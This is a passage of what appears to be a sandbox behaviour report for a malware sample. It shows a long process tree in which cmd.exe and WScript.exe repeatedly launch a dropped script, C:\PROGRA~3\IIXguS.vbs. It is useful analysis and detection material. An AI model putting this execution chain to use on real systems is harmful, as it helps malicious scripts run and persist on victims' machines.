        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:6296
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:3584
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:7376
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:7196
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:7628
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:7344
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:7684
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:7452
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:8036
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:7748
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:7312
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:7852
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:3972
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:7932
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:4176
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:7240
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:7284
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:7408
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:7940
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:7732
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:8540
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:7260
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:8656
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:7492
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:11204
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:7552
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:9628
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:8984
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:9684
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:9532
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:9520
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:9740
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:10168
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:9836
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:9292
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:10008
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:10436
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:7640
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:8436
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:8508
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:10080
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:8616
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:8492
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:8708
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:1904
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:8804
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:10160
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:9420
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:9892
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:10092
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:9712
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:10708
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:8304
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:10564
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:9932
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:9276
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:10492
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:10536
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:8500
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:10796
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:9960
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:11128
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:10636
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:10860
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:11000
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:9124
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:4008
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:8096
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:8380
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:10588
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:5980
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:10764
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:8428
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:10384
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:3460
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:9304
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:10704
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:3800
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:9072
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:8736
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:13880
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:11364
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:11404
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:11896
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:12496
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:11928
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:12736
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:11880
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:11744
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:11988
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:7544
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:11416
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:8568
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:11492
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:11520
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:11456
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:12124
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:11612
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:11672
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:8360
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:12092
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:3112
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:13948
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:11792
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:13256
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:12000
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:12016
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:11620
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:12308
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:11952
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:14548
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:12212
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:14464
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:11808
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:16728
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:12216
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:14972
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:11644
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:15020
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:12336
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:14892
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:12472
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:14840
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:12600
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:14784
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:12688
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:16748
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:12780
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:14460
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:12840
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:16052
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:12920
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:16888
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:13100
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:16828
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:13224
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:16844
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:12432
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:14764
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:13384
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:16796
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:13856
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:16836
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:14036
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:16876
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:13168
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:16852
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:12296
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:16820
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:12644
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:16968
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:11380
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:16956
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:13068
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:17016
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:11800
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:15036
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:7868
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:16944
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:13500
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:16268
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:13020
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:16400
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:12956
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:15824
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:12796
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:12724
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:14168
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:17240
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:14080
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:14524
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:14472
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:18084
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:14648
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:16512
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:14912
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:18068
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:14984
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:18128
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:14656
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:15812
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:15232
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:14660
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:16668
    - - C:\Windows\SysWOW64\cmd.exe
        
